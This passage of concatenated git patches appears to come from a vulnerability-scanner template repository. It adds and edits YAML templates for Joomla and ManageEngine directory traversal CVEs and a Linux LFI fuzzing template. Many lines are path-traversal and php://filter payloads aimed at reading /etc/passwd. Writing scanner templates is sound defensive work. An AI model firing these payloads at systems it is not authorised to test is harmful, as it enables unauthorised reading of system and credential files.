CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file From 85eb35df9401e337135e7c0803b166c451b9fc2e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 19 Sep 2021 06:43:28 +0700 Subject: [PATCH 2420/4083] Create CVE-2010-1858.yaml --- cves/2010/CVE-2010-1858.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1858.yaml diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml new file mode 100644 index 0000000000..6413a93362 --- /dev/null +++ b/cves/2010/CVE-2010-1858.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1858 + +info: + name: Joomla! Component SMEStorage - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11853 + - https://www.cvedetails.com/cve/CVE-2010-1858 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_smestorage&controller=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c58eb8a396e635336c95c4c270945c7369ef5800 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 19 Sep 2021 13:27:49 +0530 Subject: [PATCH 2421/4083] Update pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index 07b8208fb8..e733d7dd6d 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -12,7 +12,6 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: @@ -20,7 +19,3 @@ requests: - 'Start Your New Landing Page Now!' - 'pagewiz' condition: and - - - type: status - status: - - 200 From cb9d6937664b864c2638f3cc9ed473da314996ba Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 19 Sep 2021 13:31:10 +0530 Subject: [PATCH 2422/4083] misc update --- takeovers/pagewiz-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index e733d7dd6d..b0e1f8cad3 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -4,7 +4,7 @@ info: name: Pagewiz subdomain takeover author: brabbit10 severity: high - reference: https://www.pagewiz.com/ + reference: https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL tags: takeover requests: From 2d9d6fb732e7f48b1f853f08f1c3c0554889a0ae Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 19 Sep 2021 13:52:41 +0530 Subject: [PATCH 2423/4083] Disabling workflow validation temporarily --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index e1e189c35b..e652333875 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -29,5 +29,5 @@ jobs: - name: Template Validation run: | nuclei -validate -t . - nuclei -validate -w ./workflows + # nuclei -validate -w ./workflows # Disabling temporarily shell: bash \ No newline at end of file From f0e52f1acbc4b2c3b180cfb2f0cb2d5613a9311b Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 19 Sep 2021 14:19:08 +0530 Subject: [PATCH 2424/4083] workflow updates --- workflows/airflow-workflow.yaml | 2 +- workflows/sap-netweaver-workflow.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 1408a62b69..0c7f03ee01 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -7,7 +7,7 @@ info: workflows: - - template: technologies/airflow-detect.yaml + - template: technologies/apache/airflow-detect.yaml subtemplates: - template: cves/2020/CVE-2020-11978.yaml - template: cves/2020/CVE-2020-13927.yaml diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index e94191bb2d..7b86e45fcb 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -6,7 +6,7 @@ info: description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target. workflows: - - template: technologies/sap-netweaver-detect.yaml # HTTP Templates + - template: technologies/sap/sap-netweaver-detect.yaml subtemplates: - template: cves/2020/CVE-2020-6287.yaml - template: cves/2017/CVE-2017-12637.yaml From ffe20a273de25e013bf1cf9dc1fdfbe954e280d2 Mon Sep 17 00:00:00 2001 From: kn1ght <50470310+knightm4re@users.noreply.github.com> Date: Sun, 19 Sep 2021 20:23:22 -0300 Subject: [PATCH 2425/4083] fix: typo error --- vulnerabilities/rocketchat/unauth-message-read.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 0041ad36f2..3e4626f984 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -1,4 +1,4 @@ -id: rockethchat-unauth-access +id: rocketchat-unauth-access info: name: RocketChat Unauthenticated Read Access @@ -6,7 +6,7 @@ info: severity: critical description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. reference: https://docs.rocket.chat/guides/security/security-updates - tags: rockethchat,unauth + tags: rocketchat,unauth requests: - raw: From 991963fe4a75284e118db49854a5a537544e5a43 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 20 Sep 2021 12:11:56 +0700 Subject: [PATCH 2426/4083] Update Severity --- vulnerabilities/other/acme-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml index e6e5af1c0d..3b4de118e0 100644 --- a/vulnerabilities/other/acme-xss.yaml +++ b/vulnerabilities/other/acme-xss.yaml @@ -3,7 +3,7 @@ id: acme-xss info: name: ACME / Let's Encrypt Reflected XSS author: pdteam - severity: low + severity: medium tags: xss,acme requests: From 1a94175ff672573db8ded2db5e6cbbfdf019467c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 20 Sep 2021 13:46:31 +0530 Subject: [PATCH 2427/4083] Update CVE-2010-1858.yaml --- cves/2010/CVE-2010-1858.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml index 6413a93362..084d817de4 100644 --- a/cves/2010/CVE-2010-1858.yaml +++ b/cves/2010/CVE-2010-1858.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_smestorage&controller=[LFI]%00" + - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: From 20c0e4811741e62d7e7b06fcfae7f178eee4a472 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 20 Sep 2021 20:55:31 +0700 Subject: [PATCH 2428/4083] Create CVE-2015-7780.yaml --- cves/2015/CVE-2015-7780.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2015/CVE-2015-7780.yaml diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml new file mode 100644 index 0000000000..b7f3f3a301 --- /dev/null +++ b/cves/2015/CVE-2015-7780.yaml @@ -0,0 +1,33 @@ +id: CVE-2015-7780 + +info: + name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + author: daffainfo + severity: medium + reference: + - https://www.exploit-db.com/exploits/35933 + - https://www.cvedetails.com/cve/CVE-2015-7780/ + tags: cve,cve2015,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + + - type: word + part: header + words: + - "application/xml" From f17cf513809492d2786c506b287e82c1c450ecc9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 20 Sep 2021 23:27:11 +0530 Subject: [PATCH 2429/4083] Update CVE-2015-7780.yaml --- cves/2015/CVE-2015-7780.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml index b7f3f3a301..2a886662e4 100644 --- a/cves/2015/CVE-2015-7780.yaml +++ b/cves/2015/CVE-2015-7780.yaml @@ -4,10 +4,11 @@ info: name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal author: daffainfo severity: medium + description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. reference: - https://www.exploit-db.com/exploits/35933 - https://www.cvedetails.com/cve/CVE-2015-7780/ - tags: cve,cve2015,lfi + tags: cve,cve2015,lfi,manageengine requests: - method: GET From cf0edc490a568b843695bb40d28e5351a644505d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 20 Sep 2021 23:28:06 +0530 Subject: [PATCH 2430/4083] Rename crossdomin-xml.yaml to crossdomain-xml.yaml --- exposures/files/{crossdomin-xml.yaml => crossdomain-xml.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/files/{crossdomin-xml.yaml => crossdomain-xml.yaml} (100%) diff --git a/exposures/files/crossdomin-xml.yaml b/exposures/files/crossdomain-xml.yaml similarity index 100% rename from exposures/files/crossdomin-xml.yaml rename to exposures/files/crossdomain-xml.yaml From 8bf71e42f56ddf155d6149e33750448722a75579 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 20 Sep 2021 18:09:33 +0000 Subject: [PATCH 2431/4083] Auto Generated CVE annotations [Mon Sep 20 18:09:33 UTC 2021] :robot: --- cves/2015/CVE-2015-7780.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2015/CVE-2015-7780.yaml b/cves/2015/CVE-2015-7780.yaml index 2a886662e4..69704c0919 100644 --- a/cves/2015/CVE-2015-7780.yaml +++ b/cves/2015/CVE-2015-7780.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/35933 - https://www.cvedetails.com/cve/CVE-2015-7780/ tags: cve,cve2015,lfi,manageengine + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2015-7780 + cwe-id: CWE-22 requests: - method: GET From 8a985aa5c805cf5324fe64c4a2dd3771ea1c9388 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 20 Sep 2021 23:53:49 +0530 Subject: [PATCH 2432/4083] Update generic-linux-lfi.yaml --- .../generic/generic-linux-lfi.yaml | 23 +------------------ 1 file changed, 1 insertion(+), 22 deletions(-) diff --git a/vulnerabilities/generic/generic-linux-lfi.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml index b326363614..a1860993d6 100644 --- a/vulnerabilities/generic/generic-linux-lfi.yaml +++ b/vulnerabilities/generic/generic-linux-lfi.yaml @@ -10,15 +10,6 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd" - - "{{BaseURL}}/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00" - - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd" - - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00" - - "{{BaseURL}}/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - - "{{BaseURL}}/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd" - - "{{BaseURL}}/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd" - - "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" - - "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd" - "{{BaseURL}}/etc/passwd" - "{{BaseURL}}/..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5cetc/passwd" @@ -41,20 +32,8 @@ requests: - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + stop-at-first-match: true matchers: - type: regex From 3deb57ce9ff57b5d22d24fbe4a0eba44b2b99031 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 20 Sep 2021 23:55:50 +0530 Subject: [PATCH 2433/4083] Create linux-lfi-fuzzing.yaml --- fuzzing/linux-lfi-fuzzing.yaml | 40 ++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 fuzzing/linux-lfi-fuzzing.yaml diff --git a/fuzzing/linux-lfi-fuzzing.yaml b/fuzzing/linux-lfi-fuzzing.yaml new file mode 100644 index 0000000000..178646c54c --- /dev/null +++ b/fuzzing/linux-lfi-fuzzing.yaml @@ -0,0 +1,40 @@ +id: linux-lfi-fuzzing + +info: + name: Linux based LFI Fuzzing + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley + severity: high + description: Fuzzes for /etc/passwd on passed URLs + tags: linux,lfi,fuzz + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd" + - "{{BaseURL}}/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00" + - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd" + - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00" + - "{{BaseURL}}/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd" + - "{{BaseURL}}/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd" + - 